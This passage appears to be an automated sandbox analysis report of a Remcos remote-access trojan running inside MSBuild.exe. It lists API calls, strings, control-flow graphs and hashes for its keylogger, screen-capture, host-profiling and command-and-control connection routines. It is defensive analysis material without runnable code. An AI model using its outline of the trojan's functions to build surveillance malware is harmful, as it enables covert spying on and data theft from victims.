                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                Strings
                                                                                                • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                • String ID: Keylogger initialization failure: error
                                                                                                • API String ID: 3219506041-952744263
                                                                                                • Opcode ID: 8442bfc201b1d46ee8be69c69a66d86bd1dfaf312b065ba960bc2002d605c316
                                                                                                • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                • Opcode Fuzzy Hash: 8442bfc201b1d46ee8be69c69a66d86bd1dfaf312b065ba960bc2002d605c316
                                                                                                • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                • API String ID: 2281282204-3981147832
                                                                                                • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 2532271599-1507639952
                                                                                                • Opcode ID: ef5d66ee4bb06ff3c05ed398769215b11115209f5723cf7ddc80ae7be6ba4d47
                                                                                                • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                • Opcode Fuzzy Hash: ef5d66ee4bb06ff3c05ed398769215b11115209f5723cf7ddc80ae7be6ba4d47
                                                                                                • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                APIs
                                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,00000006,?,00000000), ref: 0043294C
                                                                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,00000006), ref: 00432962
                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,00000006), ref: 00432974
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                • String ID:
                                                                                                • API String ID: 1815803762-0
                                                                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                APIs
                                                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name$ComputerUser
                                                                                                • String ID:
                                                                                                • API String ID: 4229901323-0
                                                                                                • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: recv
                                                                                                • String ID:
                                                                                                • API String ID: 1507349165-0
                                                                                                • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->127 128 40da2d call 4069ba 107->128 117 40d9e0-40d9e2 108->117 121 40d9e4-40d9e9 call 40699d call 4064d0 117->121 122 40d9ee-40da01 call 401d64 call 401e8f 117->122 121->122 122->107 138 40da03-40da09 122->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 196 40dbf3 178->196 197 40dbe6-40dbf1 call 436050 178->197 188->163 202 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 196->202 197->202 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 202->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                APIs
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 0040D790
                                                                                                  • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                • API String ID: 2830904901-1887556364
                                                                                                • Opcode ID: 1c403215e1709068eefe7935be927690cc0cfa236e8e5c75288ef11f9a8b3fd0
                                                                                                • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                • Opcode Fuzzy Hash: 1c403215e1709068eefe7935be927690cc0cfa236e8e5c75288ef11f9a8b3fd0
                                                                                                • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 447 417f9f-417fe6 CreateDCA CreateCompatibleDC call 418452 450 417fe8-417fea 447->450 451 417fec-418009 call 418494 447->451 450->451 452 41800d-41800f 450->452 451->452 455 418015-418017 452->455 456 4183a7-4183ae call 401f66 452->456 455->456 458 41801d-418051 call 4184c8 CreateCompatibleBitmap 455->458 459 4183b3-4183bf 456->459 462 418053-418064 DeleteDC * 2 458->462 463 418069-418073 SelectObject 458->463 464 4183a1 DeleteObject 462->464 465 418079-41809b StretchBlt 463->465 466 41838e-41839d DeleteDC * 2 463->466 464->456 465->466 467 4180a1-4180a6 465->467 466->464 468 418122-41812a 467->468 469 4180a8-4180bd 467->469 470 418166-41817b GetObjectA 468->470 471 41812c-418133 468->471 469->468 478 4180bf-4180d3 GetIconInfo 469->478 470->466 475 418181-418193 470->475 473 418135-418154 BitBlt 471->473 474 418156-418163 471->474 473->470 474->470 476 418195-418197 475->476 477 418199-41819f 475->477 479 4181cc-4181eb LocalAlloc 476->479 477->479 480 4181a1-4181a7 477->480 478->468 481 4180d5-41811e DeleteObject * 2 DrawIcon 478->481 483 4181ec-418217 479->483 480->479 482 4181a9-4181af 480->482 481->468 482->479 484 4181b1-4181b4 482->484 485 418221-418254 GlobalAlloc 483->485 486 418219-41821e 483->486 487 4181b6-4181c7 LocalAlloc 484->487 488 4181c9-4181cb 484->488 485->466 489 41825a-418273 GetDIBits 485->489 486->485 487->483 488->479 490 418275-418296 DeleteDC * 2 DeleteObject GlobalFree 489->490 491 41829b-418363 call 401faa * 2 call 402325 call 402f08 call 402325 call 402f08 call 402325 call 402f08 DeleteObject GlobalFree DeleteDC 489->491 490->456 508 418365-418366 DeleteDC 491->508 509 418368-418387 call 401f29 call 401eea * 2 491->509 508->509 515 41838c 509->515 515->459
                                                                                                APIs
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                • DeleteObject.GDI32(?), ref: 00418107
                                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                • GlobalFree.KERNELBASE(?), ref: 0041834B
                                                                                                • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                • DeleteDC.GDI32(?), ref: 00418398
                                                                                                • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                • String ID: DISPLAY
                                                                                                • API String ID: 1765752176-865373369
                                                                                                • Opcode ID: db294d146bd71bc66e28a643656ffa8b34653d290241f577acdad01abfd34b12
                                                                                                • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                • Opcode Fuzzy Hash: db294d146bd71bc66e28a643656ffa8b34653d290241f577acdad01abfd34b12
                                                                                                • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 516 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 529 414021-414028 Sleep 516->529 530 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 516->530 529->530 545 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 530->545 546 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 530->546 599 41419a-4141a1 545->599 600 41418c-414198 545->600 546->545 601 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 599->601 600->601 628 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 601->628 629 41428f-41429d call 4041f1 601->629 651 414b54-414b66 call 4047eb call 4020b4 628->651 634 4142ca-4142df call 404915 call 40428c 629->634 635 41429f-4142c5 call 401f66 * 2 call 41a686 629->635 650 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 634->650 634->651 635->651 716 414434-414441 call 40541d 650->716 717 414446-41446d call 401e8f call 412513 650->717 665 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 651->665 666 414b8e-414b96 call 401d8c 651->666 665->666 666->545 716->717 723 414474-4145a8 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 717->723 724 41446f-414471 717->724 759 4145ad-414ac7 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 723->759 724->723 970 414ac9-414ad0 759->970 971 414adb-414ae2 759->971 970->971 972 414ad2-414ad4 970->972 973 414ae4-414ae9 call 40a767 971->973 974 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 971->974 972->971 973->974 985 414b22-414b2e CreateThread 974->985 986 414b34-414b4f call 401eea * 2 call 401e13 974->986 985->986 986->651
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                                • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                • API String ID: 524882891-329437720
                                                                                                • Opcode ID: 8c996d5790ba2b5d8a6eb0518af1636d89e77a6c8b5d3fceba9462056eaebe34
                                                                                                • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                • Opcode Fuzzy Hash: 8c996d5790ba2b5d8a6eb0518af1636d89e77a6c8b5d3fceba9462056eaebe34
                                                                                                • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
